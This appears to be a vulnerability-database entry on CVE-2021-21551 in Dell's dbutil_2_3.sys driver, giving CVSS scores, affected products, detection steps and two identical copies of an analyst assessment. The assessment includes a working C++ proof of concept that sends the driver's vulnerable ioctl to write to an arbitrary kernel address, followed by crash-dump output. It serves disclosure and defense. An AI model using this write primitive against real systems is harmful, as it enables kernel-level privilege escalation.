7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.6 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
0.002 Low
EPSS
Percentile
51.5%
Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required.
Recent assessments:
jbaines-r7 at October 25, 2021 8:11pm UTC reported:
On May 4, 2021, Dell released Dell Security Advisory 2021-088 which describes a privilege escalation vulnerability in their dbutil_2_3.sys driver. The vulnerability is assigned CVE-2021-21551 and NIST assigned it a CVSSv3 score of 7.8. The vulnerable driver is utilized during the firmware update process and is therefore widely deployed across Dell products. Please see the advisory for the full list of impacted products.
The vulnerability is the result of a write-what-where condition (CWE-123) in which a low privileged user can direct the driver to write attacker controlled data to an arbitrary memory address via an ioctl call. This allows the low privileged user to escalate permissions to SYSTEM by overwriting data structures in kernel memory. Arbitrary modification of kernel memory is also useful to an attacker with SYSTEM privileges to bypass or disable security features that are not otherwise accessible. As such, the vulnerable driver could reasonably be used in Bring Your Own Vulnerable Driver (BYOVD) attacks in the wild.
A variety of public exploits, including a Metasploit module, have been published for this vulnerability. The vulnerability has also been reportedly used in the wild.
The following products are affected. Please see DSA-2021-088 Table A for an extensive list of affected platforms and versions.
Firmware update utility packages, including BIOS update utilities, Thunderbolt firmware update utilities, TPM firmware update utilities and dock firmware update utilities.
All Dell Download Notification solutions. Dell Command Update, Dell Update, Alienware Update, and Dell SupportAssist for PCs.
Dell System Inventory Agent
Dell Platform Tags
Dell BIOS Flash Utility
The vulnerability can be recreated using this minimized proof of concept:
#include <cstdlib>
#include <iostream>
#include <Windows.h>
namespace
{
const std::string s_driverHandle("\\\\.\\DBUtil_2_3");
uint32_t s_write_ioctl = 0x9b0c1ec8;
struct exploit_struct
{
uint64_t unused0;
void* write_ptr;
uint64_t unused1;
uint64_t write_data;
};
}
int main(int p_argc, char** p_argv)
{
HANDLE driverHandle = CreateFileA(s_driverHandle.c_str(), GENERIC_WRITE | GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
if (INVALID_HANDLE_VALUE == driverHandle)
{
std::wcerr << "[!] Failed to get a handle to " << s_driverHandle.c_str() << std::endl;
return EXIT_FAILURE;
}
exploit_struct crash = { 0, (void*)0x4141414141414141, 0, 0 };
char outBuf[32] = { 0 };
DWORD bytesReturned = 0;
DeviceIoControl(driverHandle, s_write_ioctl, &crash, sizeof(exploit_struct), &outBuf, sizeof(outBuf), &bytesReturned, 0);
return EXIT_FAILURE;
}
In the above proof of concept, we open a handle to \\.\DBUtil_2_3
and issue ioctl control code 0x9b0c1ec8
. With the ioctl code we also provide a 32-byte struct containing the exploit logic. Exploitation is possible because some of the struct’s members are passed directly into a memmove
. As a reminder, memmove
is defined as:
void *memmove(void *dest, const void *src, size_t n);
The address stored in the struct’s write_ptr
will be used as the dest
parameter in the vulnerable memmove
and a pointer to the write_data
member will be used as the src
parameter. That means that the contents of write_data
will be written to the address pointed to by write_ptr
.
The above screenshot shows the affected function and memmove
call. Note that Ghidra identifies the function as a memcpy
but, for our purposes, the distinction doesn’t matter much.
The proof of concept above will attempt to write 8 bytes of 0
to the address 0x4141414141414141
. Analysis of the resulting crash below shows the attempted write of 0
to 0x4141414141414141
:
CONTEXT: ffffb30c576add00 -- (.cxr 0xffffb30c576add00)
rax=0000000000000000 rbx=ffffa20f0749bec0 rcx=4141414141414141
rdx=bebe60cdc7729697 rsi=0000000000000001 rdi=ffffa20f0749bec0
rip=fffff8047c5d17b2 rsp=ffffb30c576ae708 rbp=ffffa20f07ec2b10
r8=0000000000000007 r9=ffffa20f08b3d7c0 r10=fffff8047c5d1170
r11=4141414141414141 r12=0000000000000000 r13=0000000000000000
r14=ffffa20f09c0f7f0 r15=ffffa20f0749bd70
iopl=0 nv up ei pl nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050202
DBUtil_2_3+0x17b2:
fffff804`7c5d17b2 8801 mov byte ptr [rcx],al ds:002b:41414141`41414141=??
Resetting default scope
PROCESS_NAME: crasher.exe
The various public exploits for this vulnerability have taken a few approaches to exploitation. @waldoirc’s exploit grants the attacker SeImpersonatePrivilege and then impersonates SYSTEM via a named pipe to escalate privileges. @Void_Sec and @zeroSteiner both wrote exploits that modified the process token for privilege escalation. And @33y0re went the extra mile and achieved privilege escalation via page table corruption.
While all of the previously mentioned exploits are for low privileged users to escalate to SYSTEM, it also appears likely that this vulnerability is being used in BYOVD attacks. The following VirusTotal screenshot shows the coin-miner TJprojMain has been observed to drop dbutil_2_3.sys
to disk.
Dell didn’t truly patch this issue. Their mitigation involved deleting dbutil_2_3.sys
and switching to a driver named DBUtilDrv2.sys
, a driver that has existed since at least 2019. While the two drivers share some code, there is a notable difference in structure. Perhaps most importantly though, DBUtilDrv2.sys
is not accessible to localhost\Everyone
like dbutil_2_3.sys
is.
Processed 1 device objects.
0: kd> !devobj ffffd9884bb95670
Device object (ffffd9884bb95670) is for:
DBUtil_2_5 \Driver\DBUtilDrv2 DriverObject ffffd9884bba3800
Current Irp 00000000 RefCount 0 Type 00000022 Flags 00002044
SecurityDescriptor ffffc90b6d294ba0 DevExt ffffd9884bb95560 DevObjExt ffffd9884bb957e8
ExtensionFlags (0000000000)
Characteristics (0x00000100) FILE_DEVICE_SECURE_OPEN
AttachedTo (Lower) ffffd9884b359730 \Driver\PnpManager
Device queue is not busy.
0: kd> !sd ffffc90b6d294ba0 0x1
->Revision: 0x1
->Sbz1 : 0x0
->Control : 0x9814
SE_DACL_PRESENT
SE_SACL_PRESENT
SE_SACL_AUTO_INHERITED
SE_DACL_PROTECTED
SE_SELF_RELATIVE
->Owner : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl :
->Dacl : ->AclRevision: 0x2
->Dacl : ->Sbz1 : 0x0
->Dacl : ->AclSize : 0x58
->Dacl : ->AceCount : 0x3
->Dacl : ->Sbz2 : 0x0
->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[0]: ->AceFlags: 0x0
->Dacl : ->Ace[0]: ->AceSize: 0x14
->Dacl : ->Ace[0]: ->Mask : 0x001f01ff
->Dacl : ->Ace[0]: ->SID: S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[1]: ->AceFlags: 0x0
->Dacl : ->Ace[1]: ->AceSize: 0x18
->Dacl : ->Ace[1]: ->Mask : 0x001f01ff
->Dacl : ->Ace[1]: ->SID: S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Dacl : ->Ace[2]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[2]: ->AceFlags: 0x0
->Dacl : ->Ace[2]: ->AceSize: 0x24
->Dacl : ->Ace[2]: ->Mask : 0x001f01ff
->Dacl : ->Ace[2]: ->SID: S-1-5-21-3819158199-2843755626-3941670155-500 (User: AlbinoLobsterDev\Administrator)
Unfortunately, amongst the shared code is the vulnerable ioctl and memmove
. The proof of concept crashing exploit that is presented at the beginning of this post can trigger a BSOD against DBUtilDrv2.sys
versions 2.5 and 2.6 with minimal tweaking. Which likely means an attacker with administrative privileges could also use DBUtilDrv2.sys
in a BYOVD style attacks to gain Ring0 access.
Dell addressed issues with DBUtilDrv2.sys
in August 2021 and assigned CVE-2021-36276. See DSA-2021-152 for additional details.
Dell has a fairly extensive mitigations and update guide in DSA-2021-088. But there are a few simple ways to determine if your systems may be vulnerable. You can look for dbutil_2_3.sys
in C:\Windows\Temp
or %APPDATA%\Temp
. You can also look for a running instance by querying service control with the following command: sc.exe query DBUtil_2_3
. Example output follows:
C:\Windows\system32>sc.exe query DBUtil_2_3
SERVICE_NAME: DBUtil_2_3
TYPE : 1 KERNEL_DRIVER
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
CrowdStrike Falcon Detects Kernel Attacks Exploiting Vulnerable Dell Driver (CVE-2021-21551)
Exploit Development: CVE-2021-21551 – Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup
CVE-2021-21551: An Extended Writeup on a Vulnerable Kernel Driver
wvu-r7 at May 06, 2021 5:47pm UTC reported:
On May 4, 2021, Dell released Dell Security Advisory 2021-088 which describes a privilege escalation vulnerability in their dbutil_2_3.sys driver. The vulnerability is assigned CVE-2021-21551 and NIST assigned it a CVSSv3 score of 7.8. The vulnerable driver is utilized during the firmware update process and is therefore widely deployed across Dell products. Please see the advisory for the full list of impacted products.
The vulnerability is the result of a write-what-where condition (CWE-123) in which a low privileged user can direct the driver to write attacker controlled data to an arbitrary memory address via an ioctl call. This allows the low privileged user to escalate permissions to SYSTEM by overwriting data structures in kernel memory. Arbitrary modification of kernel memory is also useful to an attacker with SYSTEM privileges to bypass or disable security features that are not otherwise accessible. As such, the vulnerable driver could reasonably be used in Bring Your Own Vulnerable Driver (BYOVD) attacks in the wild.
A variety of public exploits, including a Metasploit module, have been published for this vulnerability. The vulnerability has also been reportedly used in the wild.
The following products are affected. Please see DSA-2021-088 Table A for an extensive list of affected platforms and versions.
Firmware update utility packages, including BIOS update utilities, Thunderbolt firmware update utilities, TPM firmware update utilities and dock firmware update utilities.
All Dell Download Notification solutions. Dell Command Update, Dell Update, Alienware Update, and Dell SupportAssist for PCs.
Dell System Inventory Agent
Dell Platform Tags
Dell BIOS Flash Utility
The vulnerability can be recreated using this minimized proof of concept:
#include <cstdlib>
#include <iostream>
#include <Windows.h>
namespace
{
const std::string s_driverHandle("\\\\.\\DBUtil_2_3");
uint32_t s_write_ioctl = 0x9b0c1ec8;
struct exploit_struct
{
uint64_t unused0;
void* write_ptr;
uint64_t unused1;
uint64_t write_data;
};
}
int main(int p_argc, char** p_argv)
{
HANDLE driverHandle = CreateFileA(s_driverHandle.c_str(), GENERIC_WRITE | GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
if (INVALID_HANDLE_VALUE == driverHandle)
{
std::wcerr << "[!] Failed to get a handle to " << s_driverHandle.c_str() << std::endl;
return EXIT_FAILURE;
}
exploit_struct crash = { 0, (void*)0x4141414141414141, 0, 0 };
char outBuf[32] = { 0 };
DWORD bytesReturned = 0;
DeviceIoControl(driverHandle, s_write_ioctl, &crash, sizeof(exploit_struct), &outBuf, sizeof(outBuf), &bytesReturned, 0);
return EXIT_FAILURE;
}
In the above proof of concept, we open a handle to \\.\DBUtil_2_3
and issue ioctl control code 0x9b0c1ec8
. With the ioctl code we also provide a 32-byte struct containing the exploit logic. Exploitation is possible because some of the struct’s members are passed directly into a memmove
. As a reminder, memmove
is defined as:
void *memmove(void *dest, const void *src, size_t n);
The address stored in the struct’s write_ptr
will be used as the dest
parameter in the vulnerable memmove
and a pointer to the write_data
member will be used as the src
parameter. That means that the contents of write_data
will be written to the address pointed to by write_ptr
.
The above screenshot shows the affected function and memmove
call. Note that Ghidra identifies the function as a memcpy
but, for our purposes, the distinction doesn’t matter much.
The proof of concept above will attempt to write 8 bytes of 0
to the address 0x4141414141414141
. Analysis of the resulting crash below shows the attempted write of 0
to 0x4141414141414141
:
CONTEXT: ffffb30c576add00 -- (.cxr 0xffffb30c576add00)
rax=0000000000000000 rbx=ffffa20f0749bec0 rcx=4141414141414141
rdx=bebe60cdc7729697 rsi=0000000000000001 rdi=ffffa20f0749bec0
rip=fffff8047c5d17b2 rsp=ffffb30c576ae708 rbp=ffffa20f07ec2b10
r8=0000000000000007 r9=ffffa20f08b3d7c0 r10=fffff8047c5d1170
r11=4141414141414141 r12=0000000000000000 r13=0000000000000000
r14=ffffa20f09c0f7f0 r15=ffffa20f0749bd70
iopl=0 nv up ei pl nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050202
DBUtil_2_3+0x17b2:
fffff804`7c5d17b2 8801 mov byte ptr [rcx],al ds:002b:41414141`41414141=??
Resetting default scope
PROCESS_NAME: crasher.exe
The various public exploits for this vulnerability have taken a few approaches to exploitation. @waldoirc’s exploit grants the attacker SeImpersonatePrivilege and then impersonates SYSTEM via a named pipe to escalate privileges. @Void_Sec and @zeroSteiner both wrote exploits that modified the process token for privilege escalation. And @33y0re went the extra mile and achieved privilege escalation via page table corruption.
While all of the previously mentioned exploits are for low privileged users to escalate to SYSTEM, it also appears likely that this vulnerability is being used in BYOVD attacks. The following VirusTotal screenshot shows the coin-miner TJprojMain has been observed to drop dbutil_2_3.sys
to disk.
Dell didn’t truly patch this issue. Their mitigation involved deleting dbutil_2_3.sys
and switching to a driver named DBUtilDrv2.sys
, a driver that has existed since at least 2019. While the two drivers share some code, there is a notable difference in structure. Perhaps most importantly though, DBUtilDrv2.sys
is not accessible to localhost\Everyone
like dbutil_2_3.sys
is.
Processed 1 device objects.
0: kd> !devobj ffffd9884bb95670
Device object (ffffd9884bb95670) is for:
DBUtil_2_5 \Driver\DBUtilDrv2 DriverObject ffffd9884bba3800
Current Irp 00000000 RefCount 0 Type 00000022 Flags 00002044
SecurityDescriptor ffffc90b6d294ba0 DevExt ffffd9884bb95560 DevObjExt ffffd9884bb957e8
ExtensionFlags (0000000000)
Characteristics (0x00000100) FILE_DEVICE_SECURE_OPEN
AttachedTo (Lower) ffffd9884b359730 \Driver\PnpManager
Device queue is not busy.
0: kd> !sd ffffc90b6d294ba0 0x1
->Revision: 0x1
->Sbz1 : 0x0
->Control : 0x9814
SE_DACL_PRESENT
SE_SACL_PRESENT
SE_SACL_AUTO_INHERITED
SE_DACL_PROTECTED
SE_SELF_RELATIVE
->Owner : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl :
->Dacl : ->AclRevision: 0x2
->Dacl : ->Sbz1 : 0x0
->Dacl : ->AclSize : 0x58
->Dacl : ->AceCount : 0x3
->Dacl : ->Sbz2 : 0x0
->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[0]: ->AceFlags: 0x0
->Dacl : ->Ace[0]: ->AceSize: 0x14
->Dacl : ->Ace[0]: ->Mask : 0x001f01ff
->Dacl : ->Ace[0]: ->SID: S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[1]: ->AceFlags: 0x0
->Dacl : ->Ace[1]: ->AceSize: 0x18
->Dacl : ->Ace[1]: ->Mask : 0x001f01ff
->Dacl : ->Ace[1]: ->SID: S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Dacl : ->Ace[2]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[2]: ->AceFlags: 0x0
->Dacl : ->Ace[2]: ->AceSize: 0x24
->Dacl : ->Ace[2]: ->Mask : 0x001f01ff
->Dacl : ->Ace[2]: ->SID: S-1-5-21-3819158199-2843755626-3941670155-500 (User: AlbinoLobsterDev\Administrator)
Unfortunately, amongst the shared code is the vulnerable ioctl and memmove
. The proof of concept crashing exploit that is presented at the beginning of this post can trigger a BSOD against DBUtilDrv2.sys
versions 2.5 and 2.6 with minimal tweaking. Which likely means an attacker with administrative privileges could also use DBUtilDrv2.sys
in a BYOVD style attacks to gain Ring0 access.
Dell addressed issues with DBUtilDrv2.sys
in August 2021 and assigned CVE-2021-36276. See DSA-2021-152 for additional details.
Dell has a fairly extensive mitigations and update guide in DSA-2021-088. But there are a few simple ways to determine if your systems may be vulnerable. You can look for dbutil_2_3.sys
in C:\Windows\Temp
or %APPDATA%\Temp
. You can also look for a running instance by querying service control with the following command: sc.exe query DBUtil_2_3
. Example output follows:
C:\Windows\system32>sc.exe query DBUtil_2_3
SERVICE_NAME: DBUtil_2_3
TYPE : 1 KERNEL_DRIVER
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
CrowdStrike Falcon Detects Kernel Attacks Exploiting Vulnerable Dell Driver (CVE-2021-21551)
Exploit Development: CVE-2021-21551 – Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup
CVE-2021-21551: An Extended Writeup on a Vulnerable Kernel Driver
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 4
packetstormsecurity.com/files/162604/Dell-DBUtil_2_3.sys-IOCTL-Memory-Read-Write.html
packetstormsecurity.com/files/162739/DELL-dbutil_2_3.sys-2.3-Arbitrary-Write-Privilege-Escalation.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21551
www.dell.com/support/kbdoc/en-us/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.6 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
0.002 Low
EPSS
Percentile
51.5%